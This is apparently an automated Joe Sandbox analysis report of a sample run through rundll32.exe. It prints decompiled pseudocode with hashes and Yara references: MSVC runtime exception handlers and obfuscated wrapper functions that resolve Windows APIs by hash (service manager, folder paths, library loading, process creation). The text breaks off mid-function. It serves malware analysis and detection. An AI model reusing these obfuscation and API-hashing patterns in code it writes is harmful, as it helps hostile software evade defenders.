Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 89d77395745d81d233aacb16cc1e66d02bdacb5c1c833554ea3477ca4157bf35
Instruction ID: 4195f098a662b01fce56375507ef603a022793ef94c33478d48d106903ee8a7f
Opcode Fuzzy Hash: 89d77395745d81d233aacb16cc1e66d02bdacb5c1c833554ea3477ca4157bf35
Instruction Fuzzy Hash: 7841B375B04254AFEB11DB99DD8199EBBF8EF85350F100066F884DB252EAB0DE80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100052F0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E100052F0(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t68;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				signed int _t95;
				char _t97;
				signed int _t103;
				signed int _t104;
				signed int _t111;
				void* _t112;
				intOrPtr _t113;
				signed int _t114;
				signed int _t116;
				void* _t117;
				void* _t118;
				void* _t125;

				_t108 = __edx;
				_t90 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t90 = E10041E47(__ecx,  *_t90);
				_t91 = _a8;
				_t6 = _t91 + 0x10; // 0x11
				_t114 = _t6;
				_v20 = _t114;
				_v12 =  *(_t91 + 8) ^  *0x1004d054;
				E100052B0(__edx, _t112, _t114,  *(_t91 + 8) ^  *0x1004d054, _t114);
				E10006AD7(_a12);
				_t68 = _a4;
				_t118 = _t117 + 0x10;
				_t113 =  *((intOrPtr*)(_t91 + 0xc));
				if(( *(_t68 + 4) & 0x00000066) != 0) {
					__eflags = _t113 - 0xfffffffe;
					if(_t113 != 0xfffffffe) {
						_t108 = 0xfffffffe;
						E10006D5C(_t91, 0xfffffffe, _t114, 0x1004d054);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t68;
					_v28 = _a12;
					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
					if(_t113 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t95 = _v12;
							_t75 = _t113 + (_t113 + 2) * 2;
							_t92 =  *((intOrPtr*)(_t95 + _t75 * 4));
							_t76 = _t95 + _t75 * 4;
							_t96 =  *((intOrPtr*)(_t76 + 4));
							_v24 = _t76;
							if( *((intOrPtr*)(_t76 + 4)) == 0) {
								_t97 = _v5;
								goto L7;
							} else {
								_t108 = _t114;
								_t77 = E10006D0C(_t96, _t114);
								_t97 = 1;
								_v5 = 1;
								_t125 = _t77;
								if(_t125 < 0) {
									_v16 = 0;
									L13:
									E100052B0(_t108, _t113, _t114, _v12, _t114);
									goto L14;
								} else {
									if(_t125 > 0) {
										_t78 = _a4;
										__eflags =  *_t78 - 0xe06d7363;
										if( *_t78 == 0xe06d7363) {
											__eflags =  *0x1004295c;
											if(__eflags != 0) {
												_t87 = E1003F6B0(__eflags, 0x1004295c);
												_t118 = _t118 + 4;
												__eflags = _t87;
												if(_t87 != 0) {
													_t116 =  *0x1004295c; // 0x1000544e
													 *0x1004223c(_a4, 1);
													 *_t116();
													_t114 = _v20;
													_t118 = _t118 + 8;
												}
												_t78 = _a4;
											}
										}
										_t109 = _t78;
										E10006D40(_t78, _a8, _t78);
										_t80 = _a8;
										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t113;
										if( *((intOrPtr*)(_t80 + 0xc)) != _t113) {
											_t109 = _t113;
											E10006D5C(_t80, _t113, _t114, 0x1004d054);
											_t80 = _a8;
										}
										 *((intOrPtr*)(_t80 + 0xc)) = _t92;
										E100052B0(_t109, _t113, _t114, _v12, _t114);
										E10006D24();
										asm("int3");
										_push(8);
										_push(0x1004af50);
										E100040F0();
										_t83 = _a4;
										__eflags = _t83;
										if(_t83 != 0) {
											__eflags =  *_t83 - 0xe06d7363;
											if( *_t83 == 0xe06d7363) {
												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
														L29:
														_t103 =  *(_t83 + 0x1c);
														__eflags = _t103;
														if(_t103 != 0) {
															_t111 =  *(_t103 + 4);
															__eflags = _t111;
															if(_t111 == 0) {
																__eflags =  *_t103 & 0x00000010;
																if(( *_t103 & 0x00000010) != 0) {
																	_t83 =  *(_t83 + 0x18);
																	_t104 =  *_t83;
																	__eflags = _t104;
																	if(_t104 != 0) {
																		 *0x1004223c(_t104);
																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
																	}
																}
															} else {
																_t54 =  &_v8;
																 *_t54 = _v8 & 0x00000000;
																__eflags =  *_t54;
																_t83 = E100054EF( *(_t83 + 0x18), _t111);
																_v8 = 0xfffffffe;
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
															goto L29;
														} else {
															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
																goto L29;
															}
														}
													}
												}
											}
										}
										 *[fs:0x0] = _v20;
										return _t83;
									} else {
										goto L7;
									}
								}
							}
							goto L37;
							L7:
							_t113 = _t92;
						} while (_t92 != 0xfffffffe);
						if(_t97 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L37:
			}

0x100052f0
0x100052f7
0x100052fc
0x10005302
0x1000530e
0x10005310
0x10005316
0x10005316
0x10005321
0x10005324
0x10005327
0x1000532f
0x10005334
0x10005337
0x1000533a
0x10005341
0x1000539d
0x100053a0
0x100053a8
0x100053af
0x00000000
0x100053af
0x00000000
0x10005343
0x10005343
0x10005349
0x1000534f
0x10005355
0x100053c0
0x100053c9
0x10005357
0x10005357
0x10005357
0x1000535d
0x10005360
0x10005363
0x10005366
0x10005369
0x1000536e
0x10005384
0x00000000
0x10005370
0x10005370
0x10005372
0x10005377
0x10005379
0x1000537c
0x1000537e
0x10005394
0x100053b4
0x100053b8
0x00000000
0x10005380
0x10005380
0x100053ca
0x100053cd
0x100053d3
0x100053d5
0x100053dc
0x100053e3
0x100053e8
0x100053eb
0x100053ed
0x100053ef
0x100053fc
0x10005402
0x10005404
0x10005407
0x10005407
0x1000540a
0x1000540a
0x100053dc
0x10005410
0x10005412
0x10005417
0x1000541a
0x1000541d
0x10005425
0x10005429
0x1000542e
0x1000542e
0x10005435
0x10005438
0x10005448
0x1000544d
0x1000544e
0x10005450
0x10005455
0x1000545a
0x1000545d
0x1000545f
0x10005461
0x10005467
0x10005469
0x1000546d
0x1000546f
0x10005476
0x1000548a
0x1000548a
0x1000548d
0x1000548f
0x10005491
0x10005494
0x10005496
0x100054c1
0x100054c4
0x100054c6
0x100054c9
0x100054cb
0x100054cd
0x100054d7
0x100054dd
0x100054dd
0x100054cd
0x10005498
0x10005498
0x10005498
0x10005498
0x100054a0
0x100054a5
0x100054a5
0x10005496
0x10005478
0x10005478
0x1000547f
0x00000000
0x10005481
0x10005481
0x10005488
0x00000000
0x00000000
0x10005488
0x1000547f
0x10005476
0x1000546d
0x10005467
0x100054e2
0x100054ee
0x10005382
0x00000000
0x10005382
0x10005380
0x1000537e
0x00000000
0x10005387
0x10005387
0x10005389
0x10005390
0x00000000
0x10005392
0x00000000
0x10005390
0x10005355
0x00000000

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 1000532F
__IsNonwritableInCurrentImage.LIBCMT ref: 100053E3

Strings

csm, xrefs: 100053CD

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: b72c7d427ada22c9dc5d255588a2ec1dadbe3eb316af704d99ff2e48eaabf8d0
Instruction ID: d5b3b1a8fdddd6847bee6f7c852b1cc60a9faa064ac7a8f1db0e4c0cbd549406
Opcode Fuzzy Hash: b72c7d427ada22c9dc5d255588a2ec1dadbe3eb316af704d99ff2e48eaabf8d0
Instruction Fuzzy Hash: 7D41B034E00219ABEF00CF68C884A9FBBF5EF45395F208055E914AB396D772EA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000616F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E1000616F(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_t75 = E10005A3D(_t96, __ecx, __edx, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E10005A3D(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E10004D85(_t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E10004CB7(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E10005D39(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E10012120(_t96, _t100, _t110, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x1000616f
0x1000616f
0x10006176
0x1000617f
0x1000629e
0x10006185
0x10006185
0x10006187
0x10006191
0x10006194
0x1000619a
0x100061a4
0x100061c9
0x100061ce
0x100061d3
0x1000629a
0x00000000
0x1000629b
0x100061d3
0x100061a4
0x100061d9
0x100061dc
0x100061df
0x100061e5
0x100061eb
0x100061fd
0x10006202
0x10006205
0x10006208
0x1000620b
0x1000620e
0x10006214
0x1000621a
0x1000621d
0x10006220
0x1000622f
0x10006230
0x10006230
0x10006235
0x10006248
0x1000624a
0x1000624f
0x1000625a
0x1000625c
0x1000625e
0x1000627a
0x1000627f
0x10006282
0x10006282
0x1000625a
0x1000624f
0x10006288
0x10006289
0x1000628c
0x1000628f
0x10006292
0x10006295
0x10006220
0x00000000
0x10006214
0x1000629f
0x100062a4
0x100062a8
0x100062ab
0x100062ac
0x100062ad
0x100062ae
0x100062b3
0x1000632b
0x1000632d
0x100062b5
0x100062b5
0x100062bb
0x00000000
0x100062bd
0x100062c0
0x100062c3
0x100062ca
0x100062cd
0x100062d1
0x10006303
0x10006306
0x1000630d
0x10006313
0x1000631d
0x10006326
0x10006326
0x1000631d
0x10006313
0x10006327
0x100062d3
0x100062d3
0x100062d3
0x100062d6
0x100062d6
0x100062da
0x00000000
0x00000000
0x100062de
0x100062f2
0x100062f2
0x100062e0
0x100062e0
0x100062e6
0x00000000
0x100062e8
0x100062e8
0x100062eb
0x100062f0
0x00000000
0x00000000
0x00000000
0x00000000
0x100062f0
0x100062e6
0x100062fb
0x100062fd
0x00000000
0x100062ff
0x100062ff
0x100062ff
0x00000000
0x100062fd
0x100062f6
0x100062f8
0x00000000
0x100062f8
0x00000000
0x00000000
0x00000000
0x100062c3
0x100062bb
0x1000632e
0x10006332
0x10006332

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 10006194

Strings

MOC, xrefs: 100061A6
RCC, xrefs: 100061AE

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 60f175a55ff9bc0045e5eacab174012f2519ec5f670666269333f57a598f3eb1
Instruction ID: 03575899430e62d736dc684c75bb2bfc08ffaeeadd59e420a1883adb1634af53
Opcode Fuzzy Hash: 60f175a55ff9bc0045e5eacab174012f2519ec5f670666269333f57a598f3eb1
Instruction Fuzzy Hash: F6418B71900209EFEF02CF94CD81AEE7BB6FF48384F258199F905A7219D735A950DB51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2684 Parent PID: 2848 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	994
Total number of Limit Nodes:	13

Executed Functions

Function 001C2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E001C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001C602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x001c295f
0x001c2964
0x001c2967
0x001c296a
0x001c296d
0x001c296e
0x001c296f
0x001c2977
0x001c2985
0x001c298a
0x001c2992
0x001c299a
0x001c29a2
0x001c29a9
0x001c29b0
0x001c29b7
0x001c29bb
0x001c29cf
0x001c29dc
0x001c29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001C29DC

Strings

<^, xrefs: 001C2977

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 585c5f251f195fe6e8e59c95342b492ebd3021f79e3b4d7f0a61d1e858bb25d7
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: F2018072A00108BFEB14DF95DC0A9DFBFB6EF48310F108089F508A6250D7B69F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001CC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001C602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001cc6e1
0x001cc6e6
0x001cc6f0
0x001cc6fc
0x001cc703
0x001cc706
0x001cc70d
0x001cc711
0x001cc715
0x001cc71c
0x001cc723
0x001cc72a
0x001cc731
0x001cc738
0x001cc751
0x001cc762
0x001cc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001CC762

Strings

/O, xrefs: 001CC6E6

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 1fbc908036176254d588e21bf3f1c3b34a866dd59970685687b245006454ceeb
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 341133B290122DBBCB25DF94DC498DFBFB8EF14714F108188F90966210D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001C1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E001C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001C602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x001c1006
0x001c1009
0x001c100c
0x001c1011
0x001c1016
0x001c101d
0x001c1026
0x001c102d
0x001c1034
0x001c103b
0x001c1047
0x001c104f
0x001c1057
0x001c105e
0x001c1065
0x001c106c
0x001c1073
0x001c1077
0x001c108b
0x001c1096
0x001c109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001C1096

Strings

[, xrefs: 001C103B

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 267db4ec8a45fb042d442dc1b53de923e2eb3456c53a142c12376804bcad5b54
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: D4015BB6D01309BBDF04DF94C94AADEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001C4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001C4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001c485e
0x001c487a
0x001c487d
0x001c4884
0x001c488b
0x001c4892
0x001c489d
0x001c48a0
0x001c48ad
0x001c48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001C48B7

Strings

[, xrefs: 001C488B

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 7377322ec9344d54c853e61200a895c2bc2dd60802e3a37876cf597f10c2dc1a
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 65F017B0A05209FBDB04CFE8CA56A9EBFB9EB40301F20818DE444BB290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001D4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E001D4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x001d4f80
0x001d4f81
0x001d4f82
0x001d4f86
0x001d4f87
0x001d4f8c
0x001d4fa5
0x001d4fa8
0x001d4faf
0x001d4fb6
0x001d4fc7
0x001d4fca
0x001d4fd7
0x001d4fe2
0x001d4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 001D4FE2

Strings

{#lm, xrefs: 001D4FC2

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 70ce5f5857b820ecea6aa23e17461251b8ac204e3de28d7e16916df4293305e4
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: CAF037B081120CFFDB04DFA4D94289EBFBAEB44300F208199E808BB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001D976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E001D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
